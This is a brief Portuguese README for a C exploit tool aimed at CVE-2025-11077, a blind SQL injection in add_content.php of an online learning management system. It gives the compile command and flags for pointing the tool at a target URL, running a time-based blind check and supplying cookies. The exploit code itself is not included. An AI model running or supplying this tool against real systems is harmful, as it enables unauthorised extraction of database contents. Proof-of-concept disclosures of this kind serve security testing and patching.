
Explorar injeção SQL cega em (Sistema de Gestão de Aprendizagem Online)
Autor: Byte Reaper
Esta vulnerabilidade é uma Injeção SQL Cega no arquivo add_content.php do Sistema de Gerenciamento de Aprendizagem Online (CVE-2025-11077), permitindo que um invasor extraia informações do banco de dados enviando requisições POST maliciosas.
Linux x86_64
GCC
gcc exploit.c argparse.c -o CVE-2025-11077 -lcurl
- AJUDA :
./CVE-2025-11077 -h
- URL alvo (URL base)
./CVE-2025-11077 -u http://[IP]
- arquivo de log :
./CVE-2025-11077 -f [FILE]
- Verificar cega baseada em tempo :
./CVE-2025-11077 -u http://[IP] -b
- Arquivo de Cookies :
./CVE-2025-11077 -u http://[IP] -c [FILE]
MIT